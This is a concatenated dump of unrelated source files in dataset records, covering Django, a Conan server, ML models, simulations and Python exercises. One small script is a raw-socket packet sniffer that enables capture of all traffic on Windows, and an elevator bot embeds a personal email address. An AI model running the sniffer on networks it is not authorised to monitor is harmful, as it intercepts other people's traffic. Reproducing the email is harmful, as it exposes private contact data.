),\n migrations.AddField(\n model_name='levelone',\n name='level',\n field=models.ForeignKey(to='multileveltest.TopLevel'),\n preserve_default=True,\n ),\n ]\n","sub_path":"multileveltest/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"520777257","text":"import codecs\nimport json\nimport os\n\nfrom bottle import request\n\nfrom conans import DEFAULT_REVISION_V1\nfrom conans.model.ref import ConanFileReference\nfrom conans.server.rest.bottle_routes import BottleRoutes\nfrom conans.server.service.v1.service import ConanService\n\n\nclass DeleteController(object):\n \"\"\"\n Serve requests related with Conan\n \"\"\"\n @staticmethod\n def attach_to(app):\n\n r = BottleRoutes()\n\n @app.route(r.recipe, method=\"DELETE\")\n def remove_recipe(name, version, username, channel, auth_user):\n \"\"\" Remove any existing recipes or its packages created.\n Will remove all revisions, packages and package revisions (parent folder)\"\"\"\n ref = ConanFileReference(name, version, username, channel)\n conan_service = ConanService(app.authorizer, app.server_store, auth_user)\n conan_service.remove_conanfile(ref)\n\n @app.route('%s/delete' % r.packages, method=\"POST\")\n def remove_packages(name, version, username, channel, auth_user):\n ref = ConanFileReference(name, version, username, channel)\n conan_service = ConanService(app.authorizer, app.server_store, auth_user)\n reader = codecs.getreader(\"utf-8\")\n payload = json.load(reader(request.body))\n conan_service.remove_packages(ref, payload[\"package_ids\"])\n\n @app.route('%s/remove_files' % r.recipe, method=\"POST\")\n def remove_recipe_files(name, version, username, channel, auth_user):\n # The remove files is a part of the upload process, where the revision in v1 will\n # always be DEFAULT_REVISION_V1\n revision = DEFAULT_REVISION_V1\n ref = ConanFileReference(name, version, username, channel, revision)\n conan_service = ConanService(app.authorizer, app.server_store, auth_user)\n reader = codecs.getreader(\"utf-8\")\n payload = json.load(reader(request.body))\n files = [os.path.normpath(filename) for filename in payload[\"files\"]]\n conan_service.remove_conanfile_files(ref, files)\n","sub_path":"conans/server/rest/controller/v1/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"242457202","text":"import socket\nimport os\n\nhost = '0.0.0.0'\nonwin = os.name == 'nt'\nif onwin:\n sock_prot = socket.IPPROTO_IP\nelse:\n sock_prot = socket.IPPROTO_ICMP\n\nsniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, sock_prot)\nsniffer.bind((host, 0))\nsniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n\nif onwin:\n sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)\n\nprint(sniffer.recvfrom(65535))\n\nif onwin:\n sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)","sub_path":"simpsnif.py","file_name":"simpsnif.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"82090784","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport shutil\nfrom pathlib import Path\n\nEXPECTED_ARGS = 3\nCHMOD_EXTENSIONS = [\".sh\", \".py\"]\nplatform = None\n\ndef usage(errorMsg):\n print(\"Usage: import.py \")\n if errorMsg:\n print(\"Error: \" + errorMsg)\n\ndef getPlatform():\n rawPlatform = sys.platform.lower()\n if rawPlatform.startswith(\"win\"):\n platform = \"Windows\"\n elif rawPlatform.startswith(\"darwin\"):\n platform = \"Mac\"\n elif rawPlatform.startswith(\"linux\"):\n platform = \"Linux\"\n else:\n raise Exception(\"Unknown platform\")\n return platform\n\ndef readConfigFile(repoDir):\n global platform\n platform = getPlatform()\n with Path(repoDir, \"mappings.json\").open() as json_file:\n mapping = json.load(json_file)\n return [x for x in mapping if platform in x[\"Platforms\"]]\n\ndef recursiveCopyNode(srcLoc, dstLoc, mode):\n #print(\"recursiveCopyNode({0},{1})\".format(srcLoc, dstLoc))\n if not srcLoc.exists():\n print(\"{0} does not exist\".format(srcLoc))\n elif srcLoc.is_dir():\n print(\"In Dir: {0}\".format(srcLoc))\n dstLoc.mkdir(parents=True, exist_ok=True)\n for node in srcLoc.iterdir():\n fileName = node.relative_to(srcLoc);\n recursiveCopyNode(node, Path(dstLoc, fileName), mode)\n else:\n print(\" v--< {0}\\n +--> {1}\\n\".format(srcLoc, dstLoc))\n shutil.copy(str(srcLoc), str(dstLoc))\n if dstLoc.suffix in CHMOD_EXTENSIONS and platform != \"Windows\" and mode == \"import\":\n dstLoc.chmod(0o740)\n\ndef processMapping(homeDir, repoDir, mode, mapping):\n repoLoc = Path(repoDir, mapping[\"Source\"])\n homeLoc = Path(homeDir, mapping[\"Destination\"])\n if mode == \"import\":\n srcLoc = repoLoc\n dstLoc = homeLoc\n else: # \"backup\"\n srcLoc = homeLoc\n dstLoc = repoLoc\n dstLoc.parent.mkdir(parents=True, exist_ok=True)\n recursiveCopyNode(srcLoc, dstLoc, mode)\n\n\ndef importMain():\n numArgs = len(sys.argv)\n #print(\"{0} args: {1}\".format(numArgs, sys.argv))\n if numArgs - 1 != EXPECTED_ARGS:\n usage(\"Expected {0} args, got {1}\".format(EXPECTED_ARGS, numArgs - 1))\n return\n homeDir, repoDir, mode = sys.argv[1:]\n if mode not in [\"import\", \"backup\"]:\n usage(\"invalid mode: {0}\".format(mode))\n return\n config = readConfigFile(repoDir)\n for mapping in config:\n processMapping(homeDir, repoDir, mode, mapping)\n\nimportMain()\n","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"123024853","text":"from boxlift_api import BoxLift, Command\nfrom collections import defaultdict\n\nclass Elevator(object):\n\tspeed = None\n\tdirection = None\n\n\tdef __init__(self, id, floor, max_floor):\n\t\tself.id = id\n\t\tself.direction = 1\n\t\tself.speed = 1\n\t\tself.buttons_pressed = []\n\t\tself.floor = floor\n\t\tself.max_floor = max_floor\n\t\tself.assigned_requests = []\n\n\tdef update_elevator(self):\n\t\t\tself.floor += (self.direction * self.speed)\n\n\tdef go_up(self):\n\t\tself.direction = 1\n\n\tdef go_down(self):\n\t\tself.direction = -1\n\n\tdef stop(self):\n\t\tself.speed = 0\n\n\tdef move(self):\n\t\tself.speed = 1\n\n\tdef chose_own_command(self):\n\t\tif self.floor == 0:\n\t\t\tself.go_up()\n\t\t\tself.move()\n\n\t\telif self.floor == self.max_floor:\n\t\t\tself.go_down()\n\t\t\tself.move()\n\n\t\telif self.floor == self.max_floor / 2:\n\t\t\tself.stop()\n\n\tdef fulfill_requests(self):\n\t\tif self.assigned_requests or self.buttons_pressed:\n\t\t\trequested_floors = [\n\t\t\t\trequest['floor'] for request in self.assigned_requests\n\t\t\t]\n\n\t\t\tfor floor in self.buttons_pressed:\n\t\t\t\trequested_floors.append(floor)\n\n\t\t\tif self.floor in requested_floors:\n\t\t\t\tself.stop()\n\n\t\t\t\tfor request in self.assigned_requests:\n\t\t\t\t\tif request['floor'] == self.floor:\n\n\t\t\t\t\t\tself.direction = request['direction']\n\t\t\t\t\t\tself.assigned_requests.remove(request)\n\t\t\t\t\t\tbreak\n\n\t\t\telse:\n\t\t\t\tif requested_floors[0] < self.floor:\n\t\t\t\t\tself.go_down()\n\t\t\t\telse:\n\t\t\t\t\tself.go_up()\n\n\t\t\t\tself.move()\n\n\t\telse:\n\t\t\tself.chose_own_command()\n\n\tdef get_command(self):\n\t\treturn Command(\n\t\t\tid=self.id,\n\t\t\tdirection=self.direction,\n\t\t\tspeed=self.speed)\n\n\tdef get_assigned(self, request):\n\t\tif request in self.assigned_requests:\n\t\t\treturn True\n\n\t\tif not self.assigned_requests and not self.buttons_pressed:\n\t\t\tself.assigned_requests.append(request)\n\t\t\treturn True\n\n\t\tif self.direction == request['direction']:\n\t\t\tif self.direction == 1 and self.floor <= request['floor']:\n\t\t\t\tself.assigned_requests.append(request)\n\t\t\t\treturn True\n\n\t\t\telif self.direction == -1 and self.floor >= request['floor']:\n\t\t\t\tself.assigned_requests.append(request)\n\t\t\t\treturn True\n\n\t\treturn False\n\ndef decide_on_commands(state, elevators):\n\tprint('########################')\n\tcommands = []\n\n\talready_assigned_requests = []\n\n\tfor elevator in elevators:\n\t\talready_assigned_requests.extend(elevator.assigned_requests)\n\n\tfor request in state['requests']:\n\t\tif request in already_assigned_requests:\n\t\t\tcontinue\n\n\t\t# find the closest elevator\n\t\televator_by_gaps = defaultdict(list)\n\n\t\tfor elevator in elevators:\n\t\t\tgap = abs(request['floor'] - elevator.floor)\n\t\t\televator_by_gaps[gap].append(elevator)\n\n\t\tassigned = False\n\t\tfor gap in sorted(elevator_by_gaps.keys()):\n\t\t\tif assigned:\n\t\t\t\tbreak\n\n\t\t\tfor elevator in elevator_by_gaps[gap]:\n\t\t\t\tif assigned:\n\t\t\t\t\tbreak\n\n\t\t\t\tassigned = elevator.get_assigned(request)\n\n\t\t\t\tif assigned:\n\t\t\t\t\tprint('elevator ', elevator.id, elevator.floor, 'got assigned', request)\n\n\tfor elevator in elevators:\n\t\televator.fulfill_requests()\n\t\tcommands.append(elevator.get_command())\n\t\televator.update_elevator()\n\n\treturn commands\n\n\n\n\n\nREG_ID = \"11650\"\nPYCON2015_EVENT_NAME = \"pycon2015\"\n\ndef run_simulation(name):\n\n\tlift_api = BoxLift(bot_name='dumbelevator', plan=name, email='sleongkoan@gmail.com',\n\t registration_id=REG_ID, event_name=PYCON2015_EVENT_NAME, sandbox_mode=True)\n\n\tstate = lift_api.send_commands()\n\n\televators = [\n\t\tElevator(\n\t\t\tid=elevator['id'],\n\t\t\tfloor=elevator['floor'],\n\t\t\tmax_floor=state['floors']\n\t\t)\n\n\t\tfor elevator in state['elevators']\n\t]\n\n\t# setup building with elevators from returned state\n\twhile state['status'] != 'finished':\n\n\t commands = decide_on_commands(state, elevators)\n\t state = lift_api.send_commands(commands)\n\n\nrun_simulation('training_1')\n# run_simulation('training_2')\n# run_simulation('training_3')\n# run_simulation('ch_rnd_500_1')\n# run_simulation('ch_rnd_500_2')\n# run_simulation('ch_rnd_500_3')\n# run_simulation('ch_clu_500_1')\n# run_simulation('ch_clu_500_2')\n# run_simulation('ch_clu_500_3')\n# run_simulation('ch_rea_1000_1')\n# run_simulation('ch_rea_1000_2')\n# run_simulation('ch_rea_1000_3')\n","sub_path":"my_lift_obj.py","file_name":"my_lift_obj.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"622394473","text":"import math\nimport random\nfrom .network import Network\n\n# Our erdos_renyi_graph network \nclass SIRModel():\n\n\tdef __init__(self,G,N,p_connected,pv,pi,g,R0):\n\t\tself.N = N\n\t\tself.p_connected = p_connected \n\t\tself.pv = pv\n\t\tself.pi = pi\n\t\tself.g = g\n\t\tself.R0 = R0\n\t\tself.G = Network(G,N,p_connected,pv,pi)\n\t\tself.G.distribute()\n\t\tself.r = (R0 * g) / self.G.degree()\n\t\tself.t = 0\n\n\tdef transit(self):\n\t\tlistaI = []\n\t\tlistaR = []\n\n\t\tnetwork = self.G.network()\n\t\t# neighbors = network.neighbors(i):\n\t\t# n_neighbors = len(neighbors)\n\n\t\tinfected = self.G.listOfClass('I')\n\n\t\tlista = []\n\t\tfor node in infected:\n\t\t\tneighbors = self.G.classNeighbors(node,\"S\")\n\t\t\tfor neighbor in neighbors:\n\t\t\t\t# if neighbor not in lista:\n\t\t\t\tlista.append(neighbor)\n\n\t\tp = self.r\n\t\tfor node in lista:\n\t\t\tr = random.random()\n\t\t\tif r < p:\n\t\t\t\tlistaI.append(node)\n\n\t\tp = self.g\n\t\tfor node in infected:\n\t\t\tr = random.random()\n\t\t\tif r < p:\n\t\t\t\tlistaR.append(node)\n\n\t\tfor i in listaI:\n\t\t\tnetwork.node[i]['state'] = 'I' \n\t\tfor r in listaR:\n\t\t\tnetwork.node[r]['state'] = 'R' \n\n\t\tself.t += 1\n\n\n\tdef stopped(self):\n\t\tsusceptible = self.G.listOfClass('S')\n\t\tflag = True\n\t\tfor node in susceptible:\n\t\t\tneighbors = self.G.classNeighbors(node,\"I\")\n\t\t\tif neighbors != []:\n\t\t\t\tflag = False\n\n\t\treturn flag and self.G.listOfClass('I') == []\n\n\n\tdef size(self):\n\t\treturn self.N\n\n","sub_path":"network/sirmodel.py","file_name":"sirmodel.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"650129466","text":"import tensorflow as tf\nsess = tf.InteractiveSession()\n\ninputs=tf.constant([ [\n\t\t\t\t\t[2,2] , [3,3] , [4,4] , [6,6] , [7,7] , [8,8] \n\t\t\t\t]\n\t\t\t\t,\n\t\t\t\t[\n\t\t\t\t\t[6,6] , [7,7] , [8,8] , [10,10] , [11,11] , [12,12]\n\t\t\t\t] ])\n#Batch , Encoder parts\nishape=inputs.get_shape().as_list()\nprint(ishape[0],ishape[1],ishape[2])\n\nclass AttentionAggregator():\n\tdef __init__(self,\n\t\t\t\tlstm_size=1,\n\t\t\t\t**kwargs):\n\t\tself.lstm_size=lstm_size\n\t\tself.cell=tf.contrib.rnn.BasicLSTMCell(lstm_size)\n\t\tself.kernel=self.add_variable('kernel',\n shape=[lstm_size, 1],\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n dtype=self.dtype,\n trainable=True)\n\n\tdef call(self,inputs,state):\n\t\tinputs_to_lstm = tf.reshape(inputs,[-1,1])\n\t\tishape=inputs.get_shape().as_list()\n\t\toutput, state = self.cell(inputs_to_lstm, self.state)\n\t\toutput=output*self.kernel\n\t\toutput=tf.reshape(output,[ishape[0],-1])\n\t\treturn output, state\n","sub_path":"nmt/tester_attn_aggregator.py","file_name":"tester_attn_aggregator.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"444982020","text":"import urllib.request\r\n\r\nurl = 'https://yihui.name/cn/'\r\nresponse = urllib.request.urlopen(url)\r\n\r\ntitle = []\r\nhtml = response.read().decode('utf-8')\r\n\r\nwhile 'href=\"/cn/20' in html:\r\n a = html.find('href=\"/cn/20')\r\n b = html.find('>', a)\r\n c = html.find('<', b)\r\n title.append(html[b+1:c])\r\n html = html[c:]\r\n\r\nfor each in title:\r\n print(each)\r\n","sub_path":"spider/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"178728089","text":"\n\nfrom typed_ast import *\nfrom tnode import *\nfrom .. import substitution as sub\nfrom ..types import typ\n\nclass TTuple(TNode):\n\t\"\"\"\n\tA node representing a list of values.\n\t\"\"\"\n\n\tdef __init__(self, n):\n\t\tsuper(TTuple,self).__init__(n)\n\t\tself.name = \"Tuple\"\n\t\tself.elts = []\n\n\tdef format_tree(self,indents):\n\t\ts = super(TTuple,self).format_tree(indents)\n\t\ts += \" \"*indents + \"Elements: \\n\"\n\t\tfor e in self.elts: s += e.format_tree(indents+1)\n\t\treturn s\n\n\tdef traverse(self, env):\n\t\tlogging.info(\"Traversing a list...\")\n\t\tself.typ = typ.TTuple([])\n\t\tfor e in self.node.elts:\n\t\t\t(elem_node, elem_sub, elem_env) = typed_ast.TypedAST.traverse(e, env)\n\t\t\tself.elts.append(elem_node)\n\t\t\tself.typ.contained.append(elem_node.typ)\n\t\treturn (self, elem_sub, env)\n","sub_path":"pyinfer/src/typed_ast/ttuple.py","file_name":"ttuple.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"544673715","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom .forms import CreateDepartment\nfrom .models import Department\nfrom django.http import HttpResponse\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n form = CreateDepartment(request.POST)\n if form.is_valid():\n form.save()\n return redirect('transport:list')\n else:\n form = CreateDepartment()\n\n context = {\"message\":\"Welcome Note\",'form':form}\n return render(request, 'transport/index.html', context)\n\ndef list(request):\n data = Department.objects.all()\n context = {\"message\":\"Listing the Departments\", \"departmentlist\":data}\n return render(request, 'transport/list.html', context)\n\ndef edit(request,id):\n department = get_object_or_404(Department, pk=id)\n #https://sixfeetup.com/blog/django-form-data-in-post\n if request.method == 'POST':\n data = request.POST.copy()\n department.name = data.get('name')\n department.code = data.get('code')\n department.description = data.get('description')\n\n form = CreateDepartment(department.__dict__)\n ###using the form to validate the Model######\n if form.is_valid():\n print(department.__dict__)\n department.save()\n return redirect('transport:list')\n\n else:\n context = {'form': form}\n return render(request, 'transport/edit.html', context)\n else:\n form = CreateDepartment(department.__dict__)\n context = {'form': form}\n return render(request, 'transport/edit.html', context)\n\ndef detail(request,id):\n department = get_object_or_404(Department, pk=id)\n context={\n\n 'department': department,\n\n 'message':'Details for '+department.name +'Department'\n }\n\n return render(request, 'transport/detail.html', context)\n","sub_path":"transport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"24189444","text":"# -*- coding: utf-8 -*-\n__prj__ = '1.0.0'\n__version__ = ''\n__license__ = 'GNU General Public License v3'\n__author__ = 'marcelo martinovic'\n__email__ = 'marcelo.martinovic@gmail.com'\n__url__ = ''\n__date__ = \"2013-11-20\"\n__updated__ = \"2013-11-20\"\n\nfrom django.db import models\n\n# Create your models here.\n","sub_path":"compras/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"274096683","text":"import torch.nn as nn\nfrom torch import Tensor\nfrom collections.abc import Iterable\nfrom typing import Optional\nfrom fairseq_las.models import DEFAULT_ENC_VGGBLOCK_CONFIG\nfrom fairseq_las.models.modules import lstm\nfrom fairseq_las.models.vggblock import VGGBlock\nfrom fairseq.models import FairseqEncoder\nfrom fairseq.modules import FairseqDropout\n\n\nclass FairseqListener(FairseqEncoder):\n def __init__(\n self,\n dictionary,\n input_dim: int = 80,\n vggblock_config: tuple = DEFAULT_ENC_VGGBLOCK_CONFIG,\n in_channels: int = 1,\n hidden_size: int = 512,\n num_layers: int = 3,\n dropout_in: float = 0.1,\n dropout_out: float = 0.1,\n bidirectional: bool = True\n ):\n super().__init__(dictionary)\n self.num_vgg_blocks = 0\n self.padding_idx = dictionary.pad()\n self.dropout_in_module = FairseqDropout(dropout_in, module_name=self.__class__.__name__)\n self.dropout_out_module = FairseqDropout(dropout_out, module_name=self.__class__.__name__)\n\n if vggblock_config is not None:\n if not isinstance(vggblock_config, Iterable):\n raise ValueError(\"vggblock_config is not iterable\")\n self.num_vggblocks = len(vggblock_config)\n\n self.conv_layers = nn.ModuleList()\n self.in_channels = in_channels\n self.input_dim = input_dim\n self.bidirectional = bidirectional\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n\n if vggblock_config is not None:\n for _, config in enumerate(vggblock_config):\n (\n out_channels,\n conv_kernel_size,\n pooling_kernel_size,\n num_conv_layers,\n layer_norm\n ) = config\n self.conv_layers.append(\n VGGBlock(\n in_channels,\n out_channels,\n conv_kernel_size,\n pooling_kernel_size,\n num_conv_layers,\n input_dim=input_dim,\n layer_norm=layer_norm\n )\n )\n in_channels = out_channels\n input_dim = self.conv_layers[-1].output_dim\n\n self.lstm = lstm(\n input_size=input_dim << 7,\n hidden_size=hidden_size,\n num_layers=num_layers,\n dropout=self.dropout_out_module.p if num_layers > 1 else 0.,\n bidirectional=bidirectional\n )\n self.output_units = hidden_size\n if bidirectional:\n self.output_units <<= 1\n\n def forward(self, src_tokens: Tensor, src_lengths: Tensor = Optional[None], **kwargs):\n \"\"\"\n src_tokens: padded tensor B x T x C * feat\n src_lengths: tensor of original lengths of input utterances B\n \"\"\"\n batch_size = src_tokens.size(0)\n seq_length = src_tokens.size(1)\n\n x = src_tokens.view(batch_size, seq_length, self.in_channels, self.input_dim)\n x = x.transpose(1, 2).contiguous()\n\n for idx in range(len(self.conv_layers)):\n x = self.conv_layers[idx](x)\n\n batch_size = x.size(0)\n output_length = x.size(2)\n\n # (B x C x T x feat) => (B x T x C x feat) => (T x B x C x feat) => (T x B x C * feat)\n x = x.transpose(1, 2).transpose(0, 1)\n x = x.contiguous().view(output_length, batch_size, -1)\n\n subsampling_factor = int(seq_length * 1.0 / output_length + 0.5)\n input_lengths = (src_lengths.float() / subsampling_factor).ceil().long()\n\n packed_x = nn.utils.rnn.pack_padded_sequence(x, input_lengths, enforce_sorted=True)\n\n # apply LSTM\n if self.bidirectional:\n state_size = 2 * self.num_layers, batch_size, self.hidden_size\n else:\n state_size = self.num_layers, batch_size, self.hidden_size\n h0 = x.new_zeros(*state_size)\n c0 = x.new_zeros(*state_size)\n packed_outs, (final_hiddens, final_cells) = self.lstm(packed_x, (h0, c0))\n\n # unpack outputs and apply dropout\n x, _ = nn.utils.rnn.pad_packed_sequence(packed_outs, padding_value=self.padding_idx * 1.0)\n x = self.dropout_out_module(x)\n\n if self.bidirectional:\n final_hiddens = self.combine_bidirection(final_hiddens, batch_size)\n final_cells = self.combine_bidirection(final_cells, batch_size)\n\n return tuple((\n x,\n final_hiddens,\n final_cells\n ))\n\n def combine_bidirection(self, outs, batch_size: int):\n out = outs.view(self.num_layers, 2, batch_size, -1).transpose(1, 2).contiguous()\n return out.view(self.num_layers, batch_size, -1)\n\n def reorder_encoder_out(self, encoder_out, new_order):\n return tuple((\n encoder_out[0].index_select(1, new_order),\n encoder_out[1].index_select(1, new_order),\n encoder_out[2].index_select(1, new_order),\n None\n ))\n","sub_path":"fairseq_las/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"322810848","text":"# 1. Write a Python program to create a dictionary from a string.\ndef create_dict(string: str):\n str_dict = {}\n for i, j in enumerate(string):\n str_dict.update({j: i})\n return str_dict\n\n\n# 2. Write a Python program to print a dictionary in a tab form.\ndef show_dict(dictionary: dict):\n for k, v in dictionary.items():\n print(k, '\\t', v)\n\n\n# 3. Write a Python program to check if value exists in a dictionary.\ndef exists(dictionary: dict, value: str):\n return value in dictionary.values()\n\n\n# 4․ Write a Python program to remove duplicate values from Dictionary.\ndef remove_duplicates(dictionary: dict):\n without_copies = {}\n # without_copies.update({i: dictionary[i] for i in dictionary if dictionary[i] not in without_copies.values()})\n # without_copies = {i: dictionary[i] for i in dictionary if dictionary[i] not in without_copies.values()}\n for i in dictionary:\n if dictionary[i] not in without_copies.values():\n without_copies.update({i: dictionary[i]})\n print(without_copies)\n\n\n# 5. Write a Python script to generate and print a dictionary\n# that contains a number (between 1 and n) in the form (x, x*x).\ndef dict_exp():\n n = int(input(\"Input number of elements: \"))\n dict_n = {i: i ** 2 for i in range(1, n + 1)}\n return dict_n\n\n\n# 6. Write a Python script to merge two Python dictionaries\ndef merge_dict(dict1: dict, dict2: dict):\n dict1.update(dict2)\n return dict1\n\n\n# 7. Write a Python program to sum all the items in a dictionary\ndef sum_dict(dictionary: dict):\n sum_ = 0\n for i in dictionary:\n if type(dictionary[i]) is int:\n sum_ += dictionary[i]\n return sum_\n\n\n# 8. Write a Python program to remove a key from a dictionary\ndef remove_key(dictionary: dict, key):\n if key in dictionary:\n del dictionary[key]\n return dictionary\n\n\n# 9. Write a Python program to map two lists into a dictionary\ndef map_list(list1: list, list2: list):\n dictionary = {}\n # dictionary = dict(zip(list1, list2))\n for i in range(len(list1)):\n dictionary.update({list1[i]: list2[i]})\n return dictionary\n\n\n# 10. Write a Python program to get the maximum and minimum value in a dictionary\ndef min_max(dictionary: dict):\n max_v = 0\n min_v = 0\n for i in dictionary:\n for j in dictionary:\n if dictionary[i] < dictionary[j]:\n max_v = dictionary[j]\n if dictionary[i] > dictionary[j]:\n min_v = dictionary[j]\n return max_v, min_v\n\n\n# 11. Write a Python program to check a dictionary is empty or not\ndef isempty(dictionary):\n if dictionary:\n return False\n return True\n\n\n# 12. Write a Python program to combine two dictionary adding values for common keys\ndef common_dict(dict1: dict, dict2: dict):\n dictionary = {}\n for i in dict1, dict2:\n dictionary.update(i)\n return dictionary\n\n\n# 13. Write a Python program to print all unique values in a dictionary\ndef unique_values(dictionary: dict):\n ls = []\n for i in dictionary:\n if dictionary[i] not in ls:\n ls.append(dictionary[i])\n return ls\n\n\n# 14. Write a Python program to create and display all combinations of letters,\n# selecting each letter from a different key in a dictionary\n\n\n# 15. Write a Python program to drop empty Items from a given Dictionary\ndef drop_empty(dictionary: dict):\n new_dict = {k: v for k, v in dictionary.items() if v is not None}\n return new_dict\n\n\n# 16. Sort Dictionary by keys in ascending(descending) order\ndef sort_ascending_k(dictionary: dict):\n ls = list(dictionary.items())\n for i in range(len(ls)):\n for j in range(len(ls)):\n if ls[i][0] < ls[j][0]:\n ls[i], ls[j] = ls[j], ls[i]\n dictionary = dict(ls)\n return dictionary\n\n\ndef sort_descending_k(dictionary: dict):\n ls = list(dictionary.items())\n for i in range(len(ls)):\n for j in range(len(ls)):\n if ls[i][1] > ls[j][1]:\n ls[i], ls[j] = ls[j], ls[i]\n dictionary = dict(ls)\n return dictionary\n\n\n#17. Sort Dictionary by values in ascending(descending) order\ndef sort_ascending_v(dictionary: dict):\n # dictionary = sorted(dictionary.keys())\n ls = list(dictionary.items())\n for i in range(len(ls)):\n for j in range(len(ls)):\n if ls[i][1] < ls[j][1]:\n ls[i], ls[j] = ls[j], ls[i]\n dictionary = dict(ls)\n return dictionary\n\n\ndef sort_descending_v(dictionary: dict):\n # dictionary = sorted(dictionary.keys())\n ls = list(dictionary.items())\n for i in range(len(ls)):\n for j in range(len(ls)):\n if ls[i][1] > ls[j][1]:\n ls[i], ls[j] = ls[j], ls[i]\n dictionary = dict(ls)\n return dictionary\n\n\n# 18. Write a python program to remove spaces in dictionary keys and values.\ndef rm_spaces(dictionary: dict):\n # for k, v in dictionary.items():\n # if type(k) == str:\n dictionary = {k.replace(' ',''): v.replace(' ','')\n for k, v in dictionary.items() if type(k) == str and type(v) == str}\n # if type(v) == str:\n # dictionary = {k: v.replace(' ','') for k, v in dictionary.items()}\n print(dictionary)\n\n\n# 19. Find N most frequent words in text sequence, collecting data in a dictionary.\ndef validation(text: str) -> str:\n for i in text:\n if ord(i) in range(33, 65) or ord(i) \\\n in range(91, 97) or ord(i) in range(123, 127):\n text = text.replace(i, '')\n return text\n\n\ndef frequent_words(text: str, n: int):\n validation(text)\n ls_text = text.split()\n dict_text = {}\n for i in ls_text:\n dict_text[i] = 0\n for i in ls_text:\n if i in dict_text.keys():\n dict_text[i] += 1\n dict_text = {i: dict_text[i] for i in sorted(dict_text, key=lambda k: dict_text[k], reverse=True)}\n a = list(dict_text.items())\n for i in range(n):\n print(f\"\\t'{a[i][0]}'\\t-->\\t'{a[i][1]}'\")\n","sub_path":"DictionaryPractice.py","file_name":"DictionaryPractice.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"23789907","text":"import json\nimport requests\nfrom pprint import pprint\n\n\nwith open(\"D40/mount-data.json\", \"r\") as f:\n data=json.load(f)\n\n is_flying = []\n for mount in data['mounts']['collected']:\n if mount['isFlying']:\n is_flying.append(mount)\n print(len(is_flying))\n for i in is_flying:\n pprint(i['name'])\n","sub_path":"D40/api_and_json.py","file_name":"api_and_json.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"392399613","text":"import asyncio\nimport datetime\nimport pytz\n\nimport pandas as pd\nfrom zipline.data import bundles\nfrom zipline.utils import calendars\n\nfrom bundle import converter\n\ndef ingest(environ,\n asset_db_writer,\n minute_bar_writer,\n daily_bar_writer,\n adjustment_writer,\n calendar,\n start_session,\n end_session,\n cache,\n show_progress,\n output_dir):\n # hard code for just 1 day for now\n event_loop = asyncio.get_event_loop()\n try:\n event_loop.run_until_complete(\n converter.LoadData(asset_db_writer, daily_bar_writer, show_progress,\n start_session, end_session))\n finally:\n pending_tasks = [\n task for task in asyncio.Task.all_tasks() if not task.done()]\n event_loop.run_until_complete(asyncio.gather(*pending_tasks))\n event_loop.close()\n\n # create empty SQLite tables to prevent lookup errors in algorithms\n divs_splits = {\n 'divs': pd.DataFrame(columns=['sid', 'amount', 'ex_date', 'record_date',\n 'declared_date', 'pay_date']),\n 'splits': pd.DataFrame(columns=['sid', 'ratio', 'effective_date'])}\n adjustment_writer.write(\n splits=divs_splits['splits'], dividends=divs_splits['divs'])\n\nbundles.register(\n 'bitmex',\n ingest,\n calendar_name='24/7',\n start_session=pd.Timestamp(pytz.utc.localize(datetime.datetime(2019, 8, 8))),\n end_session=pd.Timestamp(pytz.utc.localize(datetime.datetime(2019, 8, 9))),\n)\n","sub_path":"zipline/bitmex/bundle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"189644546","text":"import csv\n\n\nclass CoOccurrenceMatrixParser():\n\n def __init__(self, csv_file_path):\n csv_file = open(csv_file_path, \"rb\")\n self.csv_reader = csv.reader(csv_file, delimiter=',', quotechar=\"|\")\n\n def parse(self):\n output = dict()\n # Get the keys\n keys = self.csv_reader.next()\n # Read to output\n for row in self.csv_reader:\n output_row = dict()\n for index, value in enumerate(row):\n # Skip the first 